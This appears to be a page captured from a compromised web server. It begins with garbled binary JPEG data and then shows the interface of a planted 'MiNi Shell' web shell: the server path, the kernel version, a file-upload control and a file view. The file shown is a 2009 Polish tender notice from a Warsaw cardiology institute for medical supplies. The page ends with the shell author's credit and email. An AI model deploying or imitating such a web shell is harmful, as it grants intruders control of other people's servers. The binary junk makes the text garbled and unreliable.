JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091008/173059-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa sprzętu medycznego wg specyfikacji.Znak sprawy 92/2009.</b><br>
<b>Numer ogłoszenia: 173059 - 2009; data zamieszczenia: 08.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Kardiologii , ul. Alpejska 42, 04-628 Warszawa, woj. mazowieckie, tel. 022 8120440, faks 022 8126732.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ikard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu medycznego wg specyfikacji.Znak sprawy 92/2009..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa sprzętu medycznego wg specyfikacji - łącznie 14 części.
Część nr 1.	
1.Cewnik do odsysania górnych dróg oddechowych - 60000 szt;
2.Kraniki infuzyjne trójdrożne - 30000  szt;
3.Opaska uciskowa z zatrzaskiem - 200 szt;
4.Kieliszki do leków - 5500 op.;                        
5.Łopatka drewniana do języka - 50 op.;                        
6.Słój na mocz  tulipan - 50 szt;
7.Worki do dobowej zbiórki moczu - 9000 szt;
8.Basen plastikowy - 30 szt;
9.Uchwyty na worki na mocz  - 500 szt;
10.Kubki do moczu - 25000 szt;
11.Przyrząd do przetaczania krwi TS - 30000 szt;
12.Przyrząd do przetaczania płynów infuzyjnych IS - 100000 szt;
13.Cewnik do drenażu klatki piersiowej typu Torax z troakarem - 50 szt;
14.Cewnik do drenażu klatki piersiowej typu Torax  - 3800 szt;
15.Strzykawki j.u. - 70000 szt;
16.Strzykawki plastikowe jednorazowego użytku 	 	 
 a) Strzykawki plastikowe jednorazowego użytku 2 ml - 41000 szt;
 b) Strzykawki plastikowe jednorazowego użytku 5 ml - 80000 szt;
 c) Strzykawki plastikowe jednorazowego użytku 10 ml - 250000 szt;
 d) Strzykawki plastikowe jednorazowego użytku 20 ml -120000 szt;
 e) Strzykawki plastikowe jednorazowego użytku 100 ml - 8000 szt;
 f)  Strzykawki plastikowe jednorazowego użytku 1 ml do insuliny - 6500	szt;
17.Igły jednorazowego użytku	 	 
 a) Igły j.u. 0,5x25 - 0,9x40 - 1600 op.;                         	 	
 b) Igły j.u. 1,1x40 - 1,2x40 - 2200 op.;                        
18.Igły do pobierania płynu z butelki - 19000 szt;
19.Zatyczki do sond żołądkowych - 1000 szt;
20.Dreny do przyrządu Redona - 500 szt;
21.Przedłużacze do pomp infuzyjnych bursztynowe - 8000 szt;
Część nr 2.	
1.Strzykawki 3-częściowe nakręcane Luer-Lock 10-20 ml - 10000 szt;
Część nr 3.	
1.Podkłady chłonne dla chorych	 	 
 a) Podkłady chłonne dla chorych - 7000 szt;
 b) Podkłady chłonne dla chorych - 20000 szt;
Część nr 4.	
1.Koce grzewcze j.u. dla dorosłych kompatybilne z urządzeniem EQUATOR 5000 -1500 szt;
Część nr 5.	
1.Etui do monitora Micropaq - 25000 szt;
Część nr 6.	
1.Urządzenia oddechowe sztuczny nos dla pacjentów po tracheostomii z portem do podawania tlenu - 1500 szt;
Część nr 7.	
1.Koreczki do venflonów - 100000 szt;
2.Koreczki zabezpieczające do strzykawek - 60000 szt;	 	 
Część nr 8.	
1.Dreny śródoperacyjne Torax do klatki piersiowej, miękkie, proste - 300 szt;
Część nr 9.	
1.Precyzyjny regulator przepływu w kroplówce - 1200 szt;
Część nr 10.	
1.Maski tlenowe z rezerwuarem tlenowym - 400 szt;
2.Maski tlenowe z nebulizatorem i rurką dla dorosłych - 100 szt;
3.Nebulizator tlenowy z drenem kompatybilny z respiratorem Bennett - 150 szt;
4.Obwód rur do respiratorów Bennett mod.7200; 840 ; 760 ; z łącznikiem kolankowym łączącym zaintubowanego pacjenta z układem oddechowym - 3000	szt;
5.Automatyczne zastawki do wkłuć żylnych i tętniczych - 10000 szt;
Część nr 11.	
1.Zestawy do nakłucia opłucnej - 300 szt;
Część nr12.	
1.Strzykawki do gazometrii pokryte heparyną litową kompatybilne z aparatem COBAS B221 - 50000	szt;
Część nr 13.	
1.Zestawy do nadłonowego drenażu pęcherza moczowego - 40 szt;
Cześć nr 14.	
1.Elektrody do defibrylatora HP M1724A  - 20 par;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6, 33.19.40.00-6, 33.19.60.00-0, 33.14.16.20-2, 33.14.10.00-0, 33.14.12.00-2, 33.14.13.20-9, 33.14.16.15-4, 33.16.22.00-5, 33.14.12.40-4, 33.17.11.00-0, 33.19.23.20-1, 33.15.71.10-9, 33.10.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych tj.: 1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie; 2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - zrealizowali/realizują w okresie ostatnich trzech lat przed dniem wszczęcia przedmiotowego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dostawę odpowiadającą swoim rodzajem (sprzęt medyczny) i wartością dostawom stanowiącym przedmiot zamówienia. Spełnienie warunku w tym zakresie nastąpi poprzez potwierdzenie należycie wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw oddzielnie dla każdej części, których wartość nie może być niższa niż określona przez Zamawiającego a która wynosi odpowiednio: Część nr 1- 275000,00 PLN; Część nr 2- 5800,00 PLN;Część nr 3 - 10500,00 PLN; Część nr 4 - 37000,00 PLN;Część nr 5 - 12300,00 PLN;Część nr 6 - 3000,00 PLN;Część nr 7 - 28800,00 PLN;Część nr 8 - 4600,00 PLN;Część nr 9 - 6 200,00 PLN;Część nr 10 - 65800,00 PLN;Część nr 11 - 6400,00 PLN;Część nr 12 - 61600,00 PLN;Część nr 13 - 1900,00 PLN;Część nr 14 - 1700,00 PLN;
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia- Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie; 4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 2.Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu, wg formuły spełnia/nie spełnia na podstawie złożonych przez wykonawców oświadczeń i dokumentów wymaganych przez zamawiającego.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca składa wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu, że nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych (Załącznik nr 4 do SIWZ) i że spełnia spełnienia warunki udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 4a do SIWZ) oraz następujące dokumenty: 1.W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych składa: 1)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert). 2)aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert). 2.W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia składa: wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem (sprzęt medyczny) i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wg Załącznika Nr 3 do SIWZ oraz załącza dokumenty potwierdzające, że te dostawy zostały wykonane należycie, co najmniej jedna udokumentowana dostawa w zakresie części na którą jest składana oferta o wartości określonej w rozdziale VII. pkt 1 ppkt 2) SIWZ dla poszczególnych części. 3.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej (oprócz oświadczenia, wg Załącznika Nr 4 i 4a do SIWZ), zamiast dokumentów, o których mowa w pkt 1 ppkt 1) i 2), składa odpowiedni dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, odpowiednio że: 1)nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert), 2)nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert). 4.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 3, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Wymagana data wystawienia dokumentów zgodnie z zapisami pkt 3. 5.Wykonawcy ubiegający się o udzielenie zamówienia wspólnie, wymagane warunki udziału w postępowaniu winni spełnić wspólnie. 1)w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców ubiegających się wspólnie o zamówienie oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych. Każdy oddzielnie składa oświadczenie, wg Załącznika Nr 4 do SIWZ 2)w odniesieniu do wymagań postawionych przez Zamawiającego, że Wykonawca spełnia warunki udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych, oświadczenie, wg Załącznika Nr 4a do SIWZ podpisuje ustanowiony pełnomocnik do reprezentowania wykonawców w danym postępowaniu...</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ikard.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Kardiologii, Dział Handlowy, ul. Niemodlińska 33, 04-635 Warszawa pokój 337 (na pisemny wniosek wykonawcy) koszt 15 zł netto + VAT..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2009 godzina 10:15, miejsce: Instytut Kardiologii, Dział Handlowy, ul. Niemodlińska 33, 04-635 Warszawa pokój 337.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com